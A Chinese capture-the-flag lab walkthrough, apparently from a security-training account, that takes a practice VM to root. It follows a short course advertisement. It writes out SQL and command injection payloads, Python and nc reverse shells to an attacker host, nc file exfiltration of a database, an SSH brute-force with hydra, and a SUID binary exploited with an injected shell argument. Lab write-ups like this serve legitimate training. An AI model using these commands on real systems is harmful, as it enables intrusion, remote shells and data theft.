也许你没有看过《Kali Linux 渗透测试》这门课程,但你一定听说过!这门课别名【177】(有177个课时),在众多 Kali 课程中,这门课程以其卓越的质量和完善的教学体系脱颖而出,讲师是苑房弘老师。
苑房弘老师5门课程免费学
1、OSCP all in one【高效备考】
2、Kali Linux 渗透教程
3、Web安全基础
4、Windows应急响应
5、Kali Linux 安装配置和优化
扫码回复“课程”免费领取
1
靶机目标
获取靶机root权限
2
详细步骤
一、主机发现
for i in $(seq 1 254); do sudo arping -c 2 10.0.0.$i; donesudo nmap -p- 10.0.0.20sudo nmap -p22,8080 -sV 10.0.0.20
二、Web信息收集
攻击思路:1、SQL注入;2、暴力破解(密码为password)
1启动Burp抓包
2启动浏览器-设置代理-打开 http://10.0.0.20:8080
Tip:建议使用Burp Intruder在输入框测试所有可以键盘输入的字符,检测系统返回情况。
3通过观察测试得知输入"可使程序报错,且爆出如下内容
'select * from code where password="' + password + '"'select * from code where password=" + password + "select * from code where password="; + password + ";三、SQL注入
构造攻击代码
select * from code where password="; + " or 1=1-- + ";" or 1=1--
四、命令注入(nc串联)
1测试是否存在注入漏洞
hello | id
2反弹Shell
方法一:使用Python反弹Webshell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.14",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);方法二:如果受害主机存在nc指令,可以使用nc反弹shell
hello | which nc
1Kali主机启动监听5555端口
nc -nvlp 5555
2靶机
nc 10.0.0.14 5555 -e /bin/sh #有的Linux发行版有nc命令,但没有-e参数,可以使用如下方法或者nc 10.0.0.14 5555 | /bin/sh | nc 10.0.0.14 6666 #nc串联
监听5555端口终端输入命令,监听6666端口的终端回显命令
五、系统信息收集(nc传输文件)
idls
cat app.pyfile database.sql
●经分析database.sql是sqlit数据库文件,是Web应用的数据库文件
●通过NC传输database.sql文件到kali主机,再查看数据内容
○启动kali主机nc监听
nc -lnvp 7777 > db.sql
○nc 5555终端
nc 10.0.0.14 7777 < database.sql
稍等一会后,使用Ctrl+C结束监听7777端口的终端
ls 查看db.sql已经在Kali主机上了
●用sqlite数据库打开db.sql文件,获取密码
sqlite3.open db.sql.database.dump
明文密码:
myinvitecode123mysecondinvitecodecloudavtechmostsecurescanner
●查看系统拥有Shell权限的用户
cat /etc/passwd | grep /bin/bash
系统用户名名单:
rootcloudavscanner
六、SSH密码爆破(尝试失败)
vi user.txtvi passwd.txthydra -L user.txt -P passwd.txt ssh://10.0.0.20
七、再次系统信息收集(发现具有sid权限的文件)
ls -l /home/scanner
分析上图得知:update_cloudav.c可能为update_cloudav的源码,且update_cloudav具有sid权限,且属主为root
八、代码审计
通过对update_cloudav.c的源码进行审计,发现运行update_cloudav在运行云查杀的时候一定要带参数。由此可以设想携带我们需要命令来实现root身份反弹shell。
九、NC串联、本地提权
●kali主机监听7777、8888
nc -lnvp 7777nc -lnvp 8888
●反弹Shell
./update_cloudav "a|nc 10.0.0.14 7777 | /bin/sh | nc 10.0.0.14 8888"
补充:Burp-Intruder暴力破解登录密码(略)
Kali自带的密码字典在/usr/share/wordlists
相关阅读:
原文始发于微信公众号(安全牛课堂):打靶总结-过程及思路系列29
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论